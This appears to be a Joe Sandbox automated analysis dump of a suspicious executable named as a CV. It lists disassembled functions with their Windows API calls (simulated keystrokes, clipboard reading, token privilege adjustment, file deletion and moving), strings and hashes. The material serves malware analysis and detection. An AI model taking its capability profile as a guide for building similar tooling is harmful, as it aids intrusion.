Function 0035F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0035F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035F8DC
GetWindowLongW.USER32(?,000000F0), ref: 0035F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035F940
SendMessageW.USER32 ref: 0035F966
_wcsncpy.LIBCMT ref: 0035F9D2
GetKeyState.USER32(00000011), ref: 0035F9F3
GetKeyState.USER32(00000009), ref: 0035FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035FA16
GetKeyState.USER32(00000010), ref: 0035FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035FA4F
SendMessageW.USER32 ref: 0035FA72
SendMessageW.USER32(?,00001030,?,0035E059), ref: 0035FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0035FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0035FB96
SetCapture.USER32(?), ref: 0035FB9F
ClientToScreen.USER32(?,?), ref: 0035FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0035FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0035FC29
ReleaseCapture.USER32 ref: 0035FC34
GetCursorPos.USER32(?), ref: 0035FC69
ScreenToClient.USER32(?,?), ref: 0035FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 0035FCD8
SendMessageW.USER32 ref: 0035FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 0035FD41
SendMessageW.USER32 ref: 0035FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0035FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0035FD8F
GetCursorPos.USER32(?), ref: 0035FDB0
ScreenToClient.USER32(?,?), ref: 0035FDBD
GetParent.USER32(?), ref: 0035FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 0035FE3F
SendMessageW.USER32 ref: 0035FE6F
ClientToScreen.USER32(?,?), ref: 0035FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0035FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0035FF19
SendMessageW.USER32 ref: 0035FF3C
ClientToScreen.USER32(?,?), ref: 0035FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0035FFB6
GetWindowLongW.USER32(?,000000F0), ref: 0036004B

Strings

@GUI_DRAGID, xrefs: 0035FBCC
F, xrefs: 0035FF42

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: de7a4f7076d1f7544526e777b32e2eae3e970df20eafd9ca867aab523c9439ea
Instruction ID: 0ddb59205356aca8fa65cf01daaef63eec2d21faba13d79c7d500e2da0dae121
Opcode Fuzzy Hash: de7a4f7076d1f7544526e777b32e2eae3e970df20eafd9ca867aab523c9439ea
Instruction Fuzzy Hash: A332CC74604245EFDB22CF24C884FAABBA8FF49359F140629FA99872B1D731DC48CB51

Function 0035AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0035B1CD

Strings

%d/%02d/%02d, xrefs: 0035AEFC

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 2f63c4127990fa7547976ccd6fbab82afe84e060df516028f55638f90560a41c
Instruction ID: 786c72a28109bdb2c76a827a345e631e5f355446959ee38a56e5bba30da43bc2
Opcode Fuzzy Hash: 2f63c4127990fa7547976ccd6fbab82afe84e060df516028f55638f90560a41c
Instruction Fuzzy Hash: 0312EC71500608AFEB269F24CC59FAABBB8FF45321F114229FD19EB2E0DB708945CB51

Function 0030EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0030EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00363AEA
IsIconic.USER32(000000FF), ref: 00363AF3
ShowWindow.USER32(000000FF,00000009), ref: 00363B00
SetForegroundWindow.USER32(000000FF), ref: 00363B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00363B20
GetCurrentThreadId.KERNEL32 ref: 00363B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00363B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00363B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00363B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00363B54
SetForegroundWindow.USER32(000000FF), ref: 00363B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00363B6C
keybd_event.USER32(00000012,00000000), ref: 00363B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00363B81
keybd_event.USER32(00000012,00000000), ref: 00363B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00363B8F
keybd_event.USER32(00000012,00000000), ref: 00363B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00363B9E
keybd_event.USER32(00000012,00000000), ref: 00363BA3
SetForegroundWindow.USER32(000000FF), ref: 00363BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00363BCD

Strings

Shell_TrayWnd, xrefs: 00363AE5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 3166dda29a69ecacad199289a969e84f63748fc94b9fcb9177d991910dfac246
Instruction ID: a7e4c8af0789e10ccc8f1b86be7745a51ea9c0fc0c45ab16d249a20e2c9e63bb
Opcode Fuzzy Hash: 3166dda29a69ecacad199289a969e84f63748fc94b9fcb9177d991910dfac246
Instruction Fuzzy Hash: FF317471A402187BEB326BA59C49F7F7E7CEF45B60F118015FA09EB1D0DAB15D40AAA0

Function 0032ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0032B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0032B180
Part of subcall function 0032B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0032B1AD
Part of subcall function 0032B134: GetLastError.KERNEL32 ref: 0032B1BA

_memset.LIBCMT ref: 0032AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0032AD5A
CloseHandle.KERNEL32(?), ref: 0032AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0032AD82
GetProcessWindowStation.USER32 ref: 0032AD9B
SetProcessWindowStation.USER32(00000000), ref: 0032ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0032ADBF

Part of subcall function 0032AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0032ACC0), ref: 0032AB99
Part of subcall function 0032AB84: CloseHandle.KERNEL32(?,?,0032ACC0), ref: 0032ABAB

Strings

H*:, xrefs: 0032AE40
, xrefs: 0032AD17
winsta0, xrefs: 0032AD7D
default, xrefs: 0032ADBA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*:$default$winsta0
API String ID: 2063423040-1478248578
Opcode ID: bd5e5e305b1413b679144444f67ddbd62e2bc3e293d89b36ef9a6f78a1bceba8
Instruction ID: deab1cb678162966c81f58686bf45d1ba0e68fc92e6ae3e4b3900c5dcb105aa9
Opcode Fuzzy Hash: bd5e5e305b1413b679144444f67ddbd62e2bc3e293d89b36ef9a6f78a1bceba8
Instruction Fuzzy Hash: E0819CB1800219BFDF239FA4EC49AEEBBB9FF08344F054119F814A6161DB358E95DB61

Function 003360DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00336EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00335FA6,?), ref: 00336ED8

Part of subcall function 00336EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00335FA6,?), ref: 00336EF1

Part of subcall function 0033725E: __wsplitpath.LIBCMT ref: 0033727B
Part of subcall function 0033725E: __wsplitpath.LIBCMT ref: 0033728E

Part of subcall function 003372CB: GetFileAttributesW.KERNEL32(?,00336019), ref: 003372CC

_wcscat.LIBCMT ref: 00336149
_wcscat.LIBCMT ref: 00336167
__wsplitpath.LIBCMT ref: 0033618E
FindFirstFileW.KERNEL32(?,?), ref: 003361A4
_wcscpy.LIBCMT ref: 00336209
_wcscat.LIBCMT ref: 0033621C
_wcscat.LIBCMT ref: 0033622F
lstrcmpiW.KERNEL32(?,?), ref: 0033625D
DeleteFileW.KERNEL32(?), ref: 0033626E
MoveFileW.KERNEL32(?,?), ref: 00336289
MoveFileW.KERNEL32(?,?), ref: 00336298
CopyFileW.KERNEL32(?,?,00000000), ref: 003362AD
DeleteFileW.KERNEL32(?), ref: 003362BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 003362E1
FindClose.KERNEL32(00000000), ref: 003362FD
FindClose.KERNEL32(00000000), ref: 0033630B

Strings

\*.*, xrefs: 00336138, 00336147, 00336165

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 4e19b0232fe570f2513a90a87ebcf5089a51506db7fbf340a267e22abc63e805
Instruction ID: 5290b31cd0b19dc465d58ab14a2ebd331dc063a50ac58e3eaf2fbe5defed11ec
Opcode Fuzzy Hash: 4e19b0232fe570f2513a90a87ebcf5089a51506db7fbf340a267e22abc63e805
Instruction Fuzzy Hash: 1751327280811C6ECB22EB91DC85DEFB7BCAF05300F0645E6E589E7141DE7697898FA4

Function 00346B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0038DC00), ref: 00346B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00346B44
GetClipboardData.USER32(0000000D), ref: 00346B4C
CloseClipboard.USER32 ref: 00346B58
GlobalLock.KERNEL32(00000000), ref: 00346B74
CloseClipboard.USER32 ref: 00346B7E
GlobalUnlock.KERNEL32(00000000), ref: 00346B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00346BA0
GetClipboardData.USER32(00000001), ref: 00346BA8
GlobalLock.KERNEL32(00000000), ref: 00346BB5
GlobalUnlock.KERNEL32(00000000), ref: 00346BE9
CloseClipboard.USER32 ref: 00346CF6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 282a1007da8f41fe55c687580f84c46712f54e923ad741426a16dceed844d295
Instruction ID: 4a1a037fed8be0c2d563abe34a26701e7ee3447a4af5c651a064385fa4f7f2a6
Opcode Fuzzy Hash: 282a1007da8f41fe55c687580f84c46712f54e923ad741426a16dceed844d295
Instruction Fuzzy Hash: 9851AF31200205ABD322AF61DD96F7EB7FCEF45B51F100429F64AEA1E1DF60E8458B62

Function 0033F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0033F62B
FindClose.KERNEL32(00000000), ref: 0033F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0033F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0033F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0033F6E2
__swprintf.LIBCMT ref: 0033F72E
__swprintf.LIBCMT ref: 0033F767
__swprintf.LIBCMT ref: 0033F7BB

Part of subcall function 0031172B: __woutput_l.LIBCMT ref: 00311784

__swprintf.LIBCMT ref: 0033F809
__swprintf.LIBCMT ref: 0033F858
__swprintf.LIBCMT ref: 0033F8A7
__swprintf.LIBCMT ref: 0033F8F6

Strings

%4d, xrefs: 0033F761
%02d, xrefs: 0033F7B0, 0033F7B9, 0033F807, 0033F856, 0033F8A5, 0033F8F4
%4d%02d%02d%02d%02d%02d, xrefs: 0033F728

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: ebb3d3487dc91dbe799d5a11c5ff1af98e8ff45d6ab76101b14b7e4a4eec5cb9
Instruction ID: 8776b9bec50576f08a4024162d12720f6d5d181701353bf578f37f93545dd14b
Opcode Fuzzy Hash: ebb3d3487dc91dbe799d5a11c5ff1af98e8ff45d6ab76101b14b7e4a4eec5cb9
Instruction Fuzzy Hash: BAA130B2418344ABC315EB94C995DBFB7ECAF98344F400C2EF685C6192EB34D959CB62

Function 00341B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00341B50
_wcscmp.LIBCMT ref: 00341B65
_wcscmp.LIBCMT ref: 00341B7C
GetFileAttributesW.KERNEL32(?), ref: 00341B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00341BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00341BC0
FindClose.KERNEL32(00000000), ref: 00341BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00341BE7
_wcscmp.LIBCMT ref: 00341C0E
_wcscmp.LIBCMT ref: 00341C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00341C37
SetCurrentDirectoryW.KERNEL32(003A39FC), ref: 00341C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00341C5F
FindClose.KERNEL32(00000000), ref: 00341C6C
FindClose.KERNEL32(00000000), ref: 00341C7C

Strings

*.*, xrefs: 00341BE2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 66ae8b78d2197a00cbc36ef12a693be6bc652eafc4392dcbbd7d89c4e0d62524
Instruction ID: 0dca2e1aba56375b0aa331f1ef990fc129859f82c616d5978b054896dbc4e3e6
Opcode Fuzzy Hash: 66ae8b78d2197a00cbc36ef12a693be6bc652eafc4392dcbbd7d89c4e0d62524
Instruction Fuzzy Hash: D931D332541619ABDF26ABA0DC89ADE77FCDF06320F1001A5F915E6091EB70EEC58B64

Function 00341C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00341CAB
_wcscmp.LIBCMT ref: 00341CC0
_wcscmp.LIBCMT ref: 00341CD7

Part of subcall function 00336BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00336BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00341D06
FindClose.KERNEL32(00000000), ref: 00341D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00341D2D
_wcscmp.LIBCMT ref: 00341D54
_wcscmp.LIBCMT ref: 00341D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00341D7D
SetCurrentDirectoryW.KERNEL32(003A39FC), ref: 00341D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00341DA5
FindClose.KERNEL32(00000000), ref: 00341DB2
FindClose.KERNEL32(00000000), ref: 00341DC2

Strings

*.*, xrefs: 00341D28

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: c93e9268fd1201b36956c36d1819e25533a525b45daabc5a18f192d9612e9d80
Instruction ID: d8361093cf3b4dc10be8dc05894d1b226f1fda28d2345fc7b8e4e849715fda16
Opcode Fuzzy Hash: c93e9268fd1201b36956c36d1819e25533a525b45daabc5a18f192d9612e9d80
Instruction Fuzzy Hash: F7312871901A19AACF27AFA0DC49AEE77FD9F06320F110555F805AB091DB70EEC58F64

Function 002F7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002F7DBD

Strings

], xrefs: 002F7D9F
\b(?<=\w), xrefs: 0036F877
[, xrefs: 002F7E14
Q\E, xrefs: 002F86D6
[:<:]], xrefs: 002F7D1D
\, xrefs: 0036F95B
\, xrefs: 002F7E1D
\, xrefs: 002F7D89
^, xrefs: 002F7D96
\b(?=\w), xrefs: 0036F85E
[:>:]], xrefs: 002F7D37

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 062d0f65fcc211a49b652a1ff62c003e0745a2f1449a03a946eb319f99f4ccb8
Instruction ID: ea3de6a95c57932a3fc8f3ac44cd743aa99a497420ecf9ca2c6d177758ae8bab
Opcode Fuzzy Hash: 062d0f65fcc211a49b652a1ff62c003e0745a2f1449a03a946eb319f99f4ccb8
Instruction Fuzzy Hash: 5282DF71D2421ACFCB25CF98C8806BDFBB1BF48350F25817AD919AB245E7749D91CB90

Function 0034091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 003409DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 003409EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003409FB
__wsplitpath.LIBCMT ref: 00340A59
_wcscat.LIBCMT ref: 00340A71
_wcscat.LIBCMT ref: 00340A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00340A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00340AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00340ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00340AFF
_wcscpy.LIBCMT ref: 00340B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00340B4A

Strings

*.*, xrefs: 00340B05

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 0721f9d66ed23263eaea3c0361cbeea401998c32d572ad5ca0b3fcae401bc257
Instruction ID: dfc18fd9f64bf1258637c4e381277a686784ce7d739d78e34c71942b0ff70a9e
Opcode Fuzzy Hash: 0721f9d66ed23263eaea3c0361cbeea401998c32d572ad5ca0b3fcae401bc257
Instruction Fuzzy Hash: 9C614B726043059FD715EF60C8859AEB3E8FF89314F04492AFA89DB252DB31E945CF92

Function 0032A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0032ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0032ABD7
Part of subcall function 0032ABBB: GetLastError.KERNEL32(?,0032A69F,?,?,?), ref: 0032ABE1
Part of subcall function 0032ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0032A69F,?,?,?), ref: 0032ABF0
Part of subcall function 0032ABBB: HeapAlloc.KERNEL32(00000000,?,0032A69F,?,?,?), ref: 0032ABF7
Part of subcall function 0032ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0032AC0E

Part of subcall function 0032AC56: GetProcessHeap.KERNEL32(00000008,0032A6B5,00000000,00000000,?,0032A6B5,?), ref: 0032AC62
Part of subcall function 0032AC56: HeapAlloc.KERNEL32(00000000,?,0032A6B5,?), ref: 0032AC69
Part of subcall function 0032AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0032A6B5,?), ref: 0032AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0032A6D0
_memset.LIBCMT ref: 0032A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0032A704
GetLengthSid.ADVAPI32(?), ref: 0032A715
GetAce.ADVAPI32(?,00000000,?), ref: 0032A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0032A76E
GetLengthSid.ADVAPI32(?), ref: 0032A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0032A79A
HeapAlloc.KERNEL32(00000000), ref: 0032A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0032A7C2
CopySid.ADVAPI32(00000000), ref: 0032A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0032A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0032A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0032A834

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
